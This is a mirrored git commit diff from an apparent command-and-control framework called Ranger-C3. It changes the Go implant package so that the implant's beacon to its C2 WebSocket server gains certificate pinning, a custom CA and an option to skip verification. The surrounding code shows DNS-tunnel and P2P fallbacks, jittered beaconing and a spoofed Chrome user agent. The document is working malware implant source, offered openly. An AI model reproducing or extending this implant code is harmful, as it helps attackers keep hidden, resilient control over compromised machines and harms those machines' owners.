mirror of
https://git.churchofmalware.org/ek0mssavi0r/Ranger-C3
synced 2026-09-24 08:34:47 +00:00
Upload files to "internal/implantpkg"
This commit is contained in:
@@ -3,6 +3,10 @@ package implantpkg
|
||||
|
||||
import (
|
||||
"crypto/rand"
|
||||
"crypto/sha256"
|
||||
"crypto/tls"
|
||||
"crypto/x509"
|
||||
"encoding/hex"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"log"
|
||||
@@ -15,10 +19,10 @@ import (
|
||||
"time"
|
||||
|
||||
"github.com/gorilla/websocket"
|
||||
"github.com/saviorSEC/ranger/internal/crypto"
|
||||
"github.com/saviorSEC/ranger/internal/dns"
|
||||
"github.com/saviorSEC/ranger/internal/payloads"
|
||||
"github.com/saviorSEC/ranger/internal/protocol"
|
||||
"github.com/saviorSEC/RANGER_C3/internal/crypto"
|
||||
"github.com/saviorSEC/RANGER_C3/internal/dns"
|
||||
"github.com/saviorSEC/RANGER_C3/internal/payloads"
|
||||
"github.com/saviorSEC/RANGER_C3/internal/protocol"
|
||||
)
|
||||
|
||||
const (
|
||||
@@ -29,13 +33,15 @@ const (
|
||||
// Config for the implant.
|
||||
type Config struct {
|
||||
C2URL string // WebSocket URL for primary C2
|
||||
C2Fingerprint string // TLS fingerprint for pinning
|
||||
C2Fingerprint string // SHA-256 certificate fingerprint to pin (hex)
|
||||
SessionKey []byte // pre-shared session key
|
||||
DNSDomain string // fallback DNS tunnel domain
|
||||
MeshPeers []string // fallback P2P peers
|
||||
BeaconMin int // min beacon interval (seconds)
|
||||
BeaconMax int // max beacon interval (seconds)
|
||||
Debug bool
|
||||
SkipTLSVerify bool // skip TLS certificate verification
|
||||
CAFile string // PEM file with CA / server certificate to trust
|
||||
}
|
||||
|
||||
// Implant is the core agent.
|
||||
@@ -119,8 +125,12 @@ func (im *Implant) Stop() {
|
||||
func (im *Implant) beaconPrimary() error {
|
||||
// Connect if not connected
|
||||
if im.wsConn == nil {
|
||||
tlsCfg, err := tlsClientConfig(im.cfg)
|
||||
if err != nil {
|
||||
return fmt.Errorf("tls config: %w", err)
|
||||
}
|
||||
dialer := websocket.Dialer{
|
||||
TLSClientConfig: nil, // will use system certs
|
||||
TLSClientConfig: tlsCfg, // nil = system trust store
|
||||
HandshakeTimeout: 10 * time.Second,
|
||||
}
|
||||
conn, _, err := dialer.Dial(im.cfg.C2URL, http.Header{
|
||||
@@ -430,3 +440,52 @@ func hostname() string {
|
||||
func userAgent() string {
|
||||
return "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
|
||||
}
|
||||
|
||||
// tlsClientConfig builds the TLS settings for the C2 WebSocket dial.
|
||||
func tlsClientConfig(cfg Config) (*tls.Config, error) {
|
||||
if cfg.CAFile == "" && cfg.C2Fingerprint == "" && !cfg.SkipTLSVerify {
|
||||
return nil, nil // system trust store
|
||||
}
|
||||
|
||||
tc := &tls.Config{MinVersion: tls.VersionTLS12}
|
||||
|
||||
if cfg.SkipTLSVerify {
|
||||
tc.InsecureSkipVerify = true
|
||||
}
|
||||
|
||||
if cfg.CAFile != "" {
|
||||
pemData, err := os.ReadFile(cfg.CAFile)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("read ca file: %w", err)
|
||||
}
|
||||
pool := x509.NewCertPool()
|
||||
if !pool.AppendCertsFromPEM(pemData) {
|
||||
return nil, fmt.Errorf("no certificates found in %s", cfg.CAFile)
|
||||
}
|
||||
tc.RootCAs = pool
|
||||
}
|
||||
|
||||
if cfg.C2Fingerprint != "" {
|
||||
want := normalizeFingerprint(cfg.C2Fingerprint)
|
||||
tc.InsecureSkipVerify = true // chain verifies via pin below
|
||||
tc.VerifyPeerCertificate = func(rawCerts [][]byte, _ [][]*x509.Certificate) error {
|
||||
if len(rawCerts) == 0 {
|
||||
return fmt.Errorf("no peer certificate presented")
|
||||
}
|
||||
sum := sha256.Sum256(rawCerts[0])
|
||||
if hex.EncodeToString(sum[:]) != want {
|
||||
return fmt.Errorf("certificate fingerprint mismatch")
|
||||
}
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
return tc, nil
|
||||
}
|
||||
|
||||
func normalizeFingerprint(fp string) string {
|
||||
fp = strings.ToLower(strings.TrimSpace(fp))
|
||||
fp = strings.ReplaceAll(fp, ":", "")
|
||||
fp = strings.ReplaceAll(fp, " ", "")
|
||||
return fp
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user